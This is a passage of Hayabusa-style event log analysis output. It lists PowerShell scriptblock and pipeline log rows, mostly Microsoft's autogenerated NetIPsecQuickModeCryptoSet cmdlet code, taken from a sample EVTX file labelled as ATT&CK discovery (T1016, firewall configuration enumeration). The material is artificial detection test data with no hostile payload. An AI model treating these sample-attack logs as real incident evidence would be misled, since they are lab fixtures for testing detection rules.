Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
